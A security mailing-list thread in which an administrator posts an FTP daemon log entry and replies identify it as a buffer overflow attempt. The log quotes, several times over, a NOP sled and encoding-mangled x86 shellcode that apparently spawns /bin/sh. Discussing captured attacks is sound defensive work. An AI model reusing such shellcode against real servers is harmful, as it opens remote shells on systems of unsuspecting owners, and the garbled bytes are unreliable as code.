Hi, my server had registry de following entry: Jan 11 06:02:36 cumana in.ftpd[23016]: connect from pedro@150.185.69.34 Jan 11 06:02:36 cumana ftpd[23016]: connection from complex.ciens.ucv.ve Jan 11 06:02:37 cumana ftpd[23016]: ANONYMOUS FTP LOGIN FROM complex.ciens.ucv.ve ~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~ P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P ~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~ P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~ P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~ P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P ~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~ P~P~P~P~P~P~P~P~P~P1À1Û1É°FÍ~@1À1ÛC~IÙA°?Í~@ëk^1À1É~M^^A~HF^Df¹ÿ^A°'Í~@1À~M^^ A°=Í~@1À1Û~M^^H~IC^B1ÉþÉ1À~M^^H°^LÍ~@þÉuó1À~HF^I~M^^H°=Í~@þ^N°0þÈ~HF^D1À~HF^ G~Iv^H~IF^L~Ió~MN^H~MV^L°^KÍ~@1À1Û°^AÍ~@è~Pÿÿÿ0bin0sh1..11 Is this message a possible attack? Thanks. Luis.
Luis José Fabbiani B. (SOPORTE) wrote:
Hi, my server had registry de following entry:
Jan 11 06:02:36 cumana in.ftpd[23016]: connect from pedro@150.185.69.34 Jan 11 06:02:36 cumana ftpd[23016]: connection from complex.ciens.ucv.ve Jan 11 06:02:37 cumana ftpd[23016]: ANONYMOUS FTP LOGIN FROM complex.ciens.ucv.ve ~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~ P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P ~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~ P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~ P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~ P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P ~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~ P~P~P~P~P~P~P~P~P~P1Ŕ1Ű1É°FÍ~@1Ŕ1ŰC~IŮA°?Í~@ëk^1Ŕ1É~M^^A~HF^Dfš˙^A°'Í~@1Ŕ~M^^ A°=Í~@1Ŕ1Ű~M^^H~IC^B1ÉţÉ1Ŕ~M^^H°^LÍ~@ţÉuó1Ŕ~HF^I~M^^H°=Í~@ţ^N°0ţČ~HF^D1Ŕ~HF^ G~Iv^H~IF^L~Ió~MN^H~MV^L°^KÍ~@1Ŕ1Ű°^AÍ~@č~P˙˙˙0bin0sh1..11
Is this message a possible attack?
Thanks.
Luis.
--------------------------------------------------------------------- To unsubscribe, e-mail: suse-security-unsubscribe@suse.com For additional commands, e-mail: suse-security-help@suse.com
Yes... Or somebody wanted You to be scared or sth Anyway there is /bin/sh string visible in the last line - a sign that this probably was exec(/bin/sh) try... Grzegorz Prokopski PS: Anyway You should check consistiecy of your filesystem after all... and logs. But probably somebody tryed to use exploit for another ftp daemon than Yours (or older version of it). Else he probably wouldn't leave the logs.
Hi, my server had registry de following entry:
Jan 11 06:02:36 cumana in.ftpd[23016]: connect from pedro@150.185.69.34 Jan 11 06:02:36 cumana ftpd[23016]: connection from complex.ciens.ucv.ve Jan 11 06:02:37 cumana ftpd[23016]: ANONYMOUS FTP LOGIN FROM complex.ciens.ucv.ve ~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~ P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P ~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~ P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~ P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~ P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P ~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~ P~P~P~P~P~P~P~P~P~P1À1Û1É°FÍ~@1À1ÛC~IÙA°?Í~@ëk^1À1É~M^^A~HF^Df¹ÿ^A°'Í~@1À~M^^ A°=Í~@1À1Û~M^^H~IC^B1ÉþÉ1À~M^^H°^LÍ~@þÉuó1À~HF^I~M^^H°=Í~@þ^N°0þÈ~HF^D1À~HF^ G~Iv^H~IF^L~Ió~MN^H~MV^L°^KÍ~@1À1Û°^AÍ~@è~Pÿÿÿ0bin0sh1..11
Is this message a possible attack?
Yes, it is. This is clearly a buffer overflow attack. Please mail me (privately for now) the ftp server you're using, at which version. I'll summarize.
Thanks.
Luis.
Thanks,
Roman.
--
- -
| Roman Drahtmüller
~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~ P~P~P~P~P~P~P~P~P~P1À1Û1É°FÍ~@1À1ÛC~IÙA°?Í~@ëk^1À1É~M^^A~HF^Df¹ÿ^A°'Í~@1À~M^^ A°=Í~@1À1Û~M^^H~IC^B1ÉþÉ1À~M^^H°^LÍ~@þÉuó1À~HF^I~M^^H°=Í~@þ^N°0þÈ~HF^D1À~HF^ G~Iv^H~IF^L~Ió~MN^H~MV^L°^KÍ~@1À1Û°^AÍ~@è~Pÿÿÿ0bin0sh1..11
Is this message a possible attack?
Yes, it is. This is clearly a buffer overflow attack.
Please mail me (privately for now) the ftp server you're using, at which version.
I'll summarize.
There have been questions about why I asked to reply privately.
Two things: First off, it was never said that this is a full-disclosure
security mailing list. Nobody _must_ enclose all details, but everybody
_can_. If Luis decides to do so, I'm one of those who can easiest live
with it. I'm concerned about _his_ privacy in this matter.
Second: I don't want that people provide any information about their setup
on this list, especially if language skills might lead to
misunderstandings. As far as I'm concerned: As soon as I know what's
broken and if it's exploitable, I know enough to find my first victim...
Promise: I'll summarize everything as soon as I can.
Roman.
--
- -
| Roman Drahtmüller
~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~ P~P~P~P~P~P~P~P~P~P1À1Û1É°FÍ~@1À1ÛC~IÙA°?Í~@ëk^1À1É~M^^A~HF^Df¹ÿ^A°'Í~@1À~M^^ A°=Í~@1À1Û~M^^H~IC^B1ÉþÉ1À~M^^H°^LÍ~@þÉuó1À~HF^I~M^^H°=Í~@þ^N°0þÈ~HF^D1À~HF^ G~Iv^H~IF^L~Ió~MN^H~MV^L°^KÍ~@1À1Û°^AÍ~@è~Pÿÿÿ0bin0sh1..11
Is this message a possible attack?
FYI:
I haven't got any information back from Luis, except for a request of a
description on how to knowthe versions of the packages installed.
Roman.
--
- -
| Roman Drahtmüller
participants (3)
-
Grzegorz Prokopski -
Luis José Fabbiani B. (SOPORTE) -
Roman Drahtmueller